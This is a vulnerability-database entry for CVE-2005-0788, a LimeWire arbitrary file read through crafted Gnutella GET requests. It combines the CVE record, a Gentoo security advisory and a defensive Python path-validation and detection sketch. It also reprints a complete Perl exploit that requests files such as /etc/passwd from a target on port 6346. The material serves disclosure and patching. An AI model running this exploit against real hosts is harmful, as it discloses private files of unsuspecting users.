CVE-2005-0788
CVSS 5.0
Published: 2005-03-14 00:00:00
Revised: 2016-10-17 23:14:33

[Original] LimeWire 4.1.2 through 4.5.6 allows remote attackers to read arbitrary files by specifying the full pathname in a Gnutella GET request.


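[CNNVD] LimeWire Remote Arbitrary File Access Vulnerability (CNNVD-200503-107)

        LimeWire is a file-sharing tool compatible with the Gnutella protocol.
        LimeWire has a vulnerability in the way it handles user HTTP requests; a remote attacker may exploit it to access arbitrary files on the system.
        LimeWire does not correctly handle malformed file upload and download requests: an attacker can access system files directly by inserting multiple "/" characters into the request.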

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:limewire:limewire:4.1.2
cpe:/a:limewire:limewire:4.5.6

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0788
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0788
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-107
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=111082448213238&w=2
(UNKNOWN)  BUGTRAQ  20050314 LimeWire Gnutella client two vulnerabilities
http://www.gentoo.org/security/en/glsa/glsa-200503-37.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200503-37
http://xforce.iss.net/xforce/xfdb/19693
(VENDOR_ADVISORY)  XF  limewire-client-information-disclosure(19693)

- Vulnerability information

LimeWire Remote Arbitrary File Access Vulnerability
Medium risk  Access validation error
2005-03-14 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue. Patch download link:
        http://www.limewire.com/

- Vulnerability information (879)

LimeWire 4.1.2 - 4.5.6 Inappropriate Get Request Remote Exploit (EDBID:879)
multiple remote
2005-03-14 Verified
0 lammat
N/A
#!/usr/bin/perl
#Limewire 4.1.2 - 4.5.6 remote and fucking lame exploit	    *	
#                written by lammat 			   *
#              http://grpower.ath.cx		          *
#		lammat@iname.com			 *						
#	      Discovered by Kevin Walsh                 *	

use IO::Socket;

$host = @ARGV[0];
$file = @ARGV[1];

unless (@ARGV == 2) {
print "usage: $0 host file\n";
print "E.g: $0 10.0.0.2 /etc/passwd\n";
exit
}

@req = "GET /gnutella/res//$file HTTP/1.1\n
User-Agent: I-AM-AN-ATTACKER/1.0\n
Host: 0.0.0.0:0\n
Accept: */*\n
Connection: Keep-Alive";

print "[+] checking if host exists...\n";
$string = inet_aton($host) || die "[-] Host does not exist...\n";

print "[+] $host exists...connecting...\n";
$web = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $host,
PeerPort => "6346",
)
or die "cannot connect to the $host";
if ($web)
{
print "[+] Connected...sending the request...\n";

print $web "@req";


while ( <$web> )
{ print }
close $web;
}

# milw0rm.com [2005-03-14]
		

- Vulnerability information (F36915)

Gentoo Linux Security Advisory 200503-37 (PacketStormID:F36915)
2005-04-14 00:00:00
Gentoo  security.gentoo.org
advisory
linux,gentoo
CVE-2005-0788,CVE-2005-0789

Gentoo Linux Security Advisory GLSA 200503-37 - Two input validation errors were found in the handling of Gnutella GET requests (CVE-2005-0788) and magnet requests (CVE-2005-0789). Versions less than 4.8.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200503-37
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: LimeWire: Disclosure of sensitive information
      Date: March 31, 2005
      Bugs: #85380
        ID: 200503-37

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two vulnerabilities in LimeWire can be exploited to disclose sensitive
information.

Background
==========

LimeWire is a Java peer-to-peer client compatible with the Gnutella
file-sharing protocol.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /  Vulnerable  /                     Unaffected
    -------------------------------------------------------------------
  1  net-p2p/limewire       < 4.8.1                           >= 4.8.1

Description
===========

Two input validation errors were found in the handling of Gnutella GET
requests (CAN-2005-0788) and magnet requests (CAN-2005-0789).

Impact
======

A remote attacker can craft a specific Gnutella GET request or use
directory traversal on magnet requests to read arbitrary files on the
system with the rights of the user running LimeWire.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All LimeWire users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-p2p/limewire-4.8.1"

References
==========

  [ 1 ] CAN-2005-0788
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0788
  [ 2 ] CAN-2005-0789
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0789
  [ 3 ] Secunia Advisory SA14555
        http://secunia.com/advisories/14555/

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200503-37.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



- Vulnerability information

14671
LimeWire HTTP Request Handling Arbitrary File Access
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability description

LimeWire contains a flaw that may allow a remote attacker to access arbitrary files. The issue is triggered due to improper handling of HTTP requests. By issuing a specially crafted HTTP GET request a remote attacker could access arbitrary files resulting in a loss of confidentiality.
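
A defender-side illustration of the flaw described above, added here and not taken from LimeWire or from any advisory on this page: it shows how a remainder after /gnutella/res/ that is itself a full pathname escapes a naive join, a containment check that rejects it, and the same check used to flag request lines in a log. The share root, the function names and the sample request lines are constructed assumptions.

```python
import posixpath
from urllib.parse import unquote

PREFIX = "/gnutella/res/"         # request prefix shown in the page's GET example
SHARE_ROOT = "/home/user/Shared"  # assumed share directory (hypothetical)

def naive_resolve(request_path):
    """One way such a bug arises (assumed pattern, not LimeWire's code):
    join() discards SHARE_ROOT when the remainder is an absolute path."""
    return posixpath.join(SHARE_ROOT, request_path[len(PREFIX):])

def safe_resolve(request_path):
    """Return the path inside SHARE_ROOT, or None if the request escapes it."""
    if not request_path.startswith(PREFIX):
        return None
    rest = unquote(request_path[len(PREFIX):])   # decode before validating
    if rest.startswith("/") or "\x00" in rest:   # full pathname or NUL byte
        return None
    candidate = posixpath.normpath(posixpath.join(SHARE_ROOT, rest))
    # Component-wise containment test; on a live filesystem, also resolve
    # symlinks (os.path.realpath) before comparing.
    if posixpath.commonpath([SHARE_ROOT, candidate]) != SHARE_ROOT:
        return None
    return candidate

def flag_requests(lines):
    """Detection: request lines under PREFIX that do not stay inside the share."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "GET" and parts[1].startswith(PREFIX):
            if safe_resolve(parts[1]) is None:
                hits.append(line)
    return hits

# Constructed sample request lines (not captured traffic).
SAMPLE = [
    "GET /gnutella/res/song.mp3 HTTP/1.1",
    "GET /gnutella/res//etc/passwd HTTP/1.1",
    "GET /gnutella/res/%2Fetc/passwd HTTP/1.1",
    "GET /gnutella/res/../outside.txt HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE):
        print("suspicious:", hit)
```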

- Timeline

2005-03-11 2001-01-01
2005-03-14 Unknown

- Solution

Upgrade to version 4.6.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

 

 
